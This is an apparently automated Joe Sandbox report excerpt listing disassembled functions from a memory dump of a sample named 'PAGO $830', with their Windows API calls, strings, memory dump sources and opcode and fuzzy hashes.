                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: ShowWindow
                                                          • String ID:
                                                          • API String ID: 1268545403-0
                                                          • Opcode ID: 5066566db313824b48cde04900765fec5b0de758c577c8ebca362c16b1bbe818
                                                          • Instruction ID: 38d5c590a29675827529ece0a3bb7221b6ac940cec74da004766d11851a5ad38
                                                          • Opcode Fuzzy Hash: 5066566db313824b48cde04900765fec5b0de758c577c8ebca362c16b1bbe818
                                                          • Instruction Fuzzy Hash: 7E41D831208741EED735AB3ADD88B6A7B92EF86310F1C451DE28657661C672E8C4DF31
                                                          Function 00E02C36 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DeleteObject.GDI32(00000000), ref: 00E02C4E
                                                          • GetDC.USER32(00000000), ref: 00E02C56
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E02C61
                                                          • ReleaseDC.USER32(00000000,00000000), ref: 00E02C6D
                                                          • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00E02CA9
                                                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00E02CBA
                                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00E0599A,?,?,000000FF,00000000,?,000000FF,?), ref: 00E02CF5
                                                          • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00E02D14
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                          • String ID:
                                                          • API String ID: 3864802216-0
                                                          • Opcode ID: 9522a1ff01cdc471aca85f0d46bfcae4889e0cf398540d6a992d4c6ff6a615b4
                                                          • Instruction ID: 06c18ea134f81ba88e5b5e09107b88c805ea4623ada07af7606005fb8f028631
                                                          • Opcode Fuzzy Hash: 9522a1ff01cdc471aca85f0d46bfcae4889e0cf398540d6a992d4c6ff6a615b4
                                                          • Instruction Fuzzy Hash: 4631AE72201210BFEB218F51DC89FEB3BADEF0A715F144155FE08AA2D1C6769C81CBA4
                                                          Function 00DD5578 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: _memcmp
                                                          • String ID:
                                                          • API String ID: 2931989736-0
                                                          • Opcode ID: 2c521a4a03b62bad5539d3b7fa22e45fe14a4796831d5f605e09860d7e9d884c
                                                          • Instruction ID: 4138f128d0bc63afb68542d6cc68f51f76c2a1e360a383ae3e1aa595e50dfad4
                                                          • Opcode Fuzzy Hash: 2c521a4a03b62bad5539d3b7fa22e45fe14a4796831d5f605e09860d7e9d884c
                                                          • Instruction Fuzzy Hash: 49210A61600B057BE716A910BD42FAF737DDE01354F581422FD04A6B89E710EE20C6B5
                                                          Function 00DF4ED5 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: NULL Pointer assignment$Not an Object type
                                                          • API String ID: 0-572801152
                                                          • Opcode ID: 16b8028f0ff2f571fba166d788f18e76d17410b886142f97e6e9b99d21956176
                                                          • Instruction ID: 1e0f1f34cef9cd8e44e5999280f3e3d777a03063bd3d9548d4291f498a59cceb
                                                          • Opcode Fuzzy Hash: 16b8028f0ff2f571fba166d788f18e76d17410b886142f97e6e9b99d21956176
                                                          • Instruction Fuzzy Hash: F7D18E71A0060AAFDF10CF98D881ABEB7B5BF48304F15C169EA15AB285E771ED45CB60
                                                          Function 00DB14C2 Relevance: 10.8, APIs: 7, Instructions: 268COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00DB179B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00DB156E
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00DB179B,00000000,00000000,?,00000000,?,?,?,?), ref: 00DB15F1
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00DB179B,?,00DB179B,00000000,00000000,?,00000000,?,?,?,?), ref: 00DB1684
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00DB179B,00000000,00000000,?,00000000,?,?,?,?), ref: 00DB169B
                                                            • Part of subcall function 00DA37B0: RtlAllocateHeap.NTDLL(00000000,?,00000001,?,00D8FD75,?,?,00D7B63D,00000000,?,?,?,00DE106C,00E0D0D0,?,00DB242E), ref: 00DA37E2
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00DB179B,00000000,00000000,?,00000000,?,?,?,?), ref: 00DB1717
                                                          • __freea.LIBCMT ref: 00DB1742
                                                          • __freea.LIBCMT ref: 00DB174E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                          • String ID:
                                                          • API String ID: 2829977744-0
                                                          • Opcode ID: 4ab72975bc69901feb6876ae662e0acf94ba831526c25a8d4c78872409d2cd01
                                                          • Instruction ID: 5b2efb7de5b5dd189d7685e73a53afc19128645c4164eca07b6e0876beb1ea66
                                                          • Opcode Fuzzy Hash: 4ab72975bc69901feb6876ae662e0acf94ba831526c25a8d4c78872409d2cd01
                                                          • Instruction Fuzzy Hash: 0691BF7AA00216DADF208E65C861EEEBBF5EB49710FA84169E807E7141DB35DC448BB0
                                                          Function 00D8A910 Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: ObjectSelect$BeginCreatePath
                                                          • String ID:
                                                          • API String ID: 3225163088-0
                                                          • Opcode ID: 197933656ee276d1b8e216167c15917a14284f1ea83dadb8db315271630f91a4
                                                          • Instruction ID: 81e2d042cbb0bcb9cce2c0e12eb677d716a0f0fc0a228d4587aa1e2e4c425549
                                                          • Opcode Fuzzy Hash: 197933656ee276d1b8e216167c15917a14284f1ea83dadb8db315271630f91a4
                                                          • Instruction Fuzzy Hash: 4991357194020AAFDB14DFA9CD84AEEBBB8FF48320F25815AE512B7251D374A941CF70
                                                          Function 00DE10A5 Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SafeArrayGetVartype.OLEAUT32(?,?), ref: 00DE117A
                                                          • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00DE11A2
                                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 00DE11C6
                                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 00DE11F6
                                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 00DE127D
                                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 00DE12E2
                                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 00DE134E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                          • String ID:
                                                          • API String ID: 2550207440-0
                                                          • Opcode ID: fc705660b2616914780bcf9e1200f9ff76e410902f4116a109940f9ac94dd2f6
                                                          • Instruction ID: 2c1c63db99910ad22c85f338109d673af6ac82ef33039cf6b51627e527cf7937
                                                          • Opcode Fuzzy Hash: fc705660b2616914780bcf9e1200f9ff76e410902f4116a109940f9ac94dd2f6
                                                          • Instruction Fuzzy Hash: 8C91DE79B00259AFDB00AF9AC885BBEB7B5FF04314F144029EA51EB291D774A944CBB0
                                                          Function 00DF386E Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VariantInit.OLEAUT32(?), ref: 00DF3892
                                                          • CharUpperBuffW.USER32(?,?), ref: 00DF39A1
                                                          • _wcslen.LIBCMT ref: 00DF39B1
                                                          • VariantClear.OLEAUT32(?), ref: 00DF3B46
                                                            • Part of subcall function 00DE0BFD: VariantInit.OLEAUT32(00000000), ref: 00DE0C3D
                                                            • Part of subcall function 00DE0BFD: VariantCopy.OLEAUT32(?,?), ref: 00DE0C46
                                                            • Part of subcall function 00DE0BFD: VariantClear.OLEAUT32(?), ref: 00DE0C52
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                          • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                          • API String ID: 4137639002-1221869570
                                                          • Opcode ID: 51f72b5ff384d71358d6af18b9404af5fe809e9a8e72d1f784578ed9b3c3abc6
                                                          • Instruction ID: cd6ebfc1b127337fcffd347d4c44a034ece0eb6de3fa275f3ed02cc2148a3ea1
                                                          • Opcode Fuzzy Hash: 51f72b5ff384d71358d6af18b9404af5fe809e9a8e72d1f784578ed9b3c3abc6
                                                          • Instruction Fuzzy Hash: 9B9166746083459FC710EF28C48092ABBE5FF88314F15892EF98A97351DB71EE45CBA2
                                                          Function 00DF4AD4 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00DCFEF7: CLSIDFromProgID.OLE32(?,?,?,?,?,?,?,-C000001E,00000001,?,00DCFE2A,80070057), ref: 00DCFF14
                                                            • Part of subcall function 00DCFEF7: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,?,?,?,?,-C000001E,00000001,?,00DCFE2A,80070057), ref: 00DCFF2F
                                                            • Part of subcall function 00DCFEF7: lstrcmpiW.KERNEL32(?,00000000,?,?,?,?,?,?,?,-C000001E,00000001,?,00DCFE2A,80070057), ref: 00DCFF3D
                                                            • Part of subcall function 00DCFEF7: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,?,?,?,?,-C000001E,00000001,?,00DCFE2A,80070057), ref: 00DCFF4D
                                                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00DF4B78
                                                          • _wcslen.LIBCMT ref: 00DF4C80
                                                          • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00DF4CF6
                                                          • CoTaskMemFree.OLE32(?), ref: 00DF4D01
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                          • String ID: NULL Pointer assignment
                                                          • API String ID: 614568839-2785691316
                                                          • Opcode ID: e7b3e4e383b18a60ce1af1ec0a5f0b7afa82055423f98e78ab45f4d82dd97d6d
                                                          • Instruction ID: 1dca32ed19f9aac97717994c67111b8acd90e0a2ed12078690df241c88d1e1bd
                                                          • Opcode Fuzzy Hash: e7b3e4e383b18a60ce1af1ec0a5f0b7afa82055423f98e78ab45f4d82dd97d6d
                                                          • Instruction Fuzzy Hash: 66910371D0121DAFDF10DFA4D891AEEBBB8EF08314F10816AE919A7251EB709A44CF70
                                                          Function 00E02030 Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetMenu.USER32(?), ref: 00E020B6
                                                          • GetMenuItemCount.USER32(00000000), ref: 00E020E8
                                                          • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00E02110
                                                          • _wcslen.LIBCMT ref: 00E02146
                                                          • GetMenuItemID.USER32(?,?), ref: 00E02180
                                                          • GetSubMenu.USER32(?,?), ref: 00E0218E
                                                            • Part of subcall function 00DD3985: GetWindowThreadProcessId.USER32(?,00000000), ref: 00DD399F
                                                            • Part of subcall function 00DD3985: GetCurrentThreadId.KERNEL32 ref: 00DD39A6
                                                            • Part of subcall function 00DD3985: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00DD24F7), ref: 00DD39AD
                                                          • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00E02216
                                                            • Part of subcall function 00DDE899: Sleep.KERNEL32 ref: 00DDE911
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                          • String ID:
                                                          • API String ID: 4196846111-0
                                                          • Opcode ID: 2d427d86f83c6d4721d416d3092157c31209c516b6e87e135b65f12eb1ba61d8
                                                          • Instruction ID: fa1a569ffd1ac172dd1796818be1b895ac864ce14462f2881f92062caaf328a3
                                                          • Opcode Fuzzy Hash: 2d427d86f83c6d4721d416d3092157c31209c516b6e87e135b65f12eb1ba61d8
                                                          • Instruction Fuzzy Hash: C1717275A00205AFCB10DF65C849AAEB7F5EF48314F14845DEA16FB391DB35AD81CBA0
                                                          Function 00DDADD8 Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetParent.USER32(?), ref: 00DDAE17
                                                          • GetKeyboardState.USER32(?), ref: 00DDAE2C
                                                          • SetKeyboardState.USER32(?), ref: 00DDAE8D
                                                          • PostMessageW.USER32(?,00000101,00000010,?), ref: 00DDAEBB
                                                          • PostMessageW.USER32(?,00000101,00000011,?), ref: 00DDAEDA
                                                          • PostMessageW.USER32(?,00000101,00000012,?), ref: 00DDAF1B
                                                          • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00DDAF3E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: MessagePost$KeyboardState$Parent
                                                          • String ID:
                                                          • API String ID: 87235514-0
                                                          • Opcode ID: 2e2d39e64a357eac1ec63e3e6e8014ad5eff325b8a879db63452d850105312ff
                                                          • Instruction ID: fc8153a4b0c6c574ae902aeaaf96a3de9f82353c493196248270e06bf8ddfe69
                                                          • Opcode Fuzzy Hash: 2e2d39e64a357eac1ec63e3e6e8014ad5eff325b8a879db63452d850105312ff
                                                          • Instruction Fuzzy Hash: E751BDA06047D53DFB3643388845BBABEA95F06704F0CC98AF1D555AC2C7A9EC88D772
                                                          Function 00DDABF8 Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetParent.USER32(00000000), ref: 00DDAC37
                                                          • GetKeyboardState.USER32(?), ref: 00DDAC4C
                                                          • SetKeyboardState.USER32(?), ref: 00DDACAD
                                                          • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00DDACD9
                                                          • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00DDACF6
                                                          • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00DDAD35
                                                          • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00DDAD56
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: MessagePost$KeyboardState$Parent
                                                          • String ID:
                                                          • API String ID: 87235514-0
                                                          • Opcode ID: 25a7caae09b63c7b6ae283e4659211910fed291a1ebe235fadbe46442f2e1f91
                                                          • Instruction ID: c6cc87e2e9a501df08fd5f870c1b0bf8fed468269acf255d6dd971cba25383f0
                                                          • Opcode Fuzzy Hash: 25a7caae09b63c7b6ae283e4659211910fed291a1ebe235fadbe46442f2e1f91
                                                          • Instruction Fuzzy Hash: 6A5137A09147D13EFB32833C8C15B767E9AAB06300F0CC98AE0D546AD2D695EC88D772
                                                          Function 00DA53BE Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00DA5B33,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 00DA5400
                                                          • __fassign.LIBCMT ref: 00DA547B
                                                          • __fassign.LIBCMT ref: 00DA5496
                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 00DA54BC
                                                          • WriteFile.KERNEL32(?,FF8BC35D,00000000,00DA5B33,00000000,?,?,?,?,?,?,?,?,?,00DA5B33,?), ref: 00DA54DB
                                                          • WriteFile.KERNEL32(?,?,00000001,00DA5B33,00000000,?,?,?,?,?,?,?,?,?,00DA5B33,?), ref: 00DA5514
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                          • String ID:
                                                          • API String ID: 1324828854-0
                                                          • Opcode ID: 1619470c785cf6cf6397d06e23a259cdcce91ac34af1643202db97130ea52e99
                                                          • Instruction ID: 0612483881ce9b4c2c23a7493081040cfa77ecb22fac4e8a2409f71d961bf430
                                                          • Opcode Fuzzy Hash: 1619470c785cf6cf6397d06e23a259cdcce91ac34af1643202db97130ea52e99
                                                          • Instruction Fuzzy Hash: 0F51D571E002499FCB10CFA9E845AEEBBF9EF0A300F14415AE956F7291D731DA45CB60
                                                          Function 00DC725D Relevance: 10.6, APIs: 7, Instructions: 129windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00DC72FC
                                                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00DC730C
                                                          • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00DC7324
                                                          • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00DC7345
                                                          • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00D8A05E,00000000,00000000,00000000,000000FF,00000000), ref: 00DC7354
                                                          • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00DC7371
                                                          • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00D8A05E,00000000,00000000,00000000,000000FF,00000000), ref: 00DC7380
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Icon$DestroyExtractMessageSend$ImageLoad
                                                          • String ID:
                                                          • API String ID: 1777660482-0
                                                          • Opcode ID: b2d9bdd9c5da724c788d7f768d0b65635755ab082240bfa36eee31aa28940b03
                                                          • Instruction ID: 2a851ecb4891694c6d0672362f00d0632f54369f6b5077b291f2986c81264173
                                                          • Opcode Fuzzy Hash: b2d9bdd9c5da724c788d7f768d0b65635755ab082240bfa36eee31aa28940b03
                                                          • Instruction Fuzzy Hash: D641FC7160024AEFEB21CF29CC45BAA7BA4EF49320F24424EF891971D1D331E941DF25
                                                          Function 00D92CB0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                          Download Yara Rule
                                                          APIs
